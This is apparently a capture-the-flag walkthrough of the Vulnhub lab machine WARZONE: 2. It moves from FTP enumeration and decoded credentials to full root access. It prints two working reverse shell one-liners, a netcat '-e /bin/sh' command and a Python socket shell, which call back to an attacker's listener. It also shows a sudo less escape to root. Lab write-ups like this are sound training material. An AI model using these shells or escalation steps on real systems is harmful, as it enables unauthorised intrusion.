Vulnhub - WARZONE: 2
Introduction
Enumeration, Flask, Port Forwarding, GTFObins
Created and Tested in Virtual box (NAT network)
Hint : lowercase letters
This is WARZONE: 2 from Vulnhub.
Ports
We’ve got 3 ports - FTP, SSH and 1337. What’s 1337? nmap doesn’t give us much, so let’s netcat it:
Okay it’s the SECRET SYSTEM REMOTE ACCESS. Let’s come back to this in a minute.
FTP
We have anonymous access, and there are three PNG images in the folder. One called username, one called password and one called token. The password and username files are images of semaphore flag messages. We can decode them by referring to a semaphore chart, and we derive the combination:
semaphore:signalperson
The token PNG file gives instructions on how to generate a token; essentially it’s a SHA256 hash of the username and password - it comes to:
833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26
1337
With our credentials above we can log in to the secret system using netcat. We can only do 3 commands:
We can’t do ls with a directory, so we can’t list files outside of /home/flagman. However we can do nc with extras, so we can do:
[semaphore] > nc -e /bin/sh 192.168.1.77 1234
And with a listener we get our first shell.
www-data
With some enumeration as www-data we can find an SSH password for flagman:
Flagman
Now we can SSH in as flagman. Once we’re there, we find that flagman can run a command as admiral; so let’s do it:
So, what is this? It’s a Flask app running in debug mode on localhost. We need to get access to it, so we can set up a port forward in Kali:
root@kali:/opt/vulnhub/warzone2# ssh -L 9999:127.0.0.1:5000 flagman@192.168.1.144
And then in Kali we can visit http://localhost:9999/ and get access to the webapp.
Flask
The front page doesn’t give much away:
Warzone 2
Under construction
search result :None
I run a gobuster on localhost:
root@kali:/opt/vulnhub/warzone2# gobuster dir -u http://localhost:9999 -w /usr/share/seclists/Discovery/Web-Content/common.txt
And this finds a directory called /console. We need to enter the PIN we found earlier, and then we can enter python commands into the console.
I use the Pentestmonkey python reverse shell code with a new listener:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
And now I have a shell as admiral.
Admiral to root
Admiral can run a command as root; specifically, he can use less to read /var/public/warzone-rules.txt. We can exploit this per GTFOBins by running the command and then running !/bin/sh.
Final Thoughts
I really enjoyed this one, it was a cracker. Easily my favourite since Nully 1. Thanks Alienum.